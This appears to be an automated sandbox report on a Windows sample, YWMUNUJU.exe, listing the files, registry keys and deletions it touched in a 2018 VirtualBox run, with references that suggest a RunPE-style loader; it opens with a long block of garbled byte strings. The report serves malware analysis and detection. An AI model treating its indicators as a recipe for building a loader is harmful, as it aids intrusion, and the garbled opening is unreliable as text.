` RT
=9c.
>:,0
_ un
<f~.
{s< X
Pk[n
2~zL.
/Ff
hIJu
K4rl/W
[ ~i
2x' Z
XDQ{
?H>'
7^qG
*s*U
M<r
0tpX
&}YQ
h/{4%
`Qk'
[*e5
zsC6
-u*(ej#
H85LMh
Lp8
&(;
Es2{}R
z^~
jm^0V
0/TBs
9I"W1
qqmv#
36P~
YLS
T(\[
0K ;
h0Aer
XcU
zD9w%
z[]%
'a4(
>SRI
R]\d
)?2]^?
dd,?@
Qv 0
POt"
4o|_D
4MW
{k%D
IcRW
J#\]
=Ndn
^',KC
?@c1
Lrl9Fd`#
b^Of
|tY@
5jeXIIrDNol4jnBFqm9odCXEecUICuP
O^ )
zI/_
A&vi
jc9W
.~L~s
g_2}
YGCo
23g}
/D#
L=|s`
/&(>b
yB<C-
I0 p
_Z=%#
mS(V
NaBp
jFgX
wU=s>q
A~r8
wY1j
.Hb]
MR>7"j
w=[bw=
2qY9
^DDDD
tUhf
MDn[
cQ:&t
4u7o"M
WCk40
z[_N
rE}M
fvj<Oo
"/10
hl$:#
v@:\
!K`A
sr{$
~)RR
QNk@
+?I
#<p;
|z\5
:L2QV
%Xj #S
#64h
KDo]
/Hn
p/R3
nA43
,!^r
i7a*
`i"?}&
8&w6
Knc=P
t>Ki
_x+4F
BjbZ
7i|3A|
-'g]`
06A
_,NG
k<O?
bn/U
6F_h
TGXG
8#9p
%Ab'?5
ZFVZU
g- mO
j{`
!]IX
JP>>
{^j0
F4>L
]+]\z
k/v~
B,Cs\9
IBbLn
_v7w
c~ck\
miRbaPSFCjEbi6fiUPU9aDLiN8eK
3A|
.U E`(
'1'^
P=e^
D,\j
:Bqq0(P
8;.:
GIE
swy i
Ahe\v
zF:g
7g g+
C_dLkk\9n
&@.
h8u1
qyH!
{[ S
rPU<
C)-b
HxWlq
8iB
~q'!
8.g/
<V v
F|w~&
\/1:
S%^"-7
7!2
l_)l
So,a"
)RO]D
R*23
z*!D
Nhnt
kv!A
%P$D
UVH
K^{,
7`7"
V4"|
*7mj 4@
}'1.Q
T>,
Qr\u{ $
(wM@
T+)[W
%$lr}
[sj RF
6Ke>
bl Z
+o.
F-O1
)C\|
axVo
^zP2
X/^DDDDD
tb'9
IUJ I"k
T KV
Els;
pbaWN:
L:Di
1\\7 Q
&'3Y
Y=x1
>z
J:M2
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-06-06 19:44:08 2018-06-06 19:46:59 171

7 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04b_64 Seven04b_64 VirtualBox 2018-06-06 19:44:08 2018-06-06 19:46:59 171

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\YWMUNUJU.exe.config
C:\Users\Seven01\AppData\Local\Temp\YWMUNUJU.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\YWMUNUJU.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\YWMUNUJU.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\YWMUNUJU.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\YWMUNUJU.resources\YWMUNUJU.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\YWMUNUJU.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\YWMUNUJU.resources\YWMUNUJU.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\YWMUNUJU.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\YWMUNUJU.resources\YWMUNUJU.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\YWMUNUJU.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\YWMUNUJU.resources\YWMUNUJU.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2356.1275296
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2356.1275296
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2356.1275343
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\YWMUNUJU.exe.config
C:\Users\Seven01\AppData\Local\Temp\YWMUNUJU.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\SysWOW64\ntdll.dll

Write Files

Nothing to display

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2356.1275296
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2356.1275296
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2356.1275343

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\YWMUNUJU.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55339718\28af6718
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
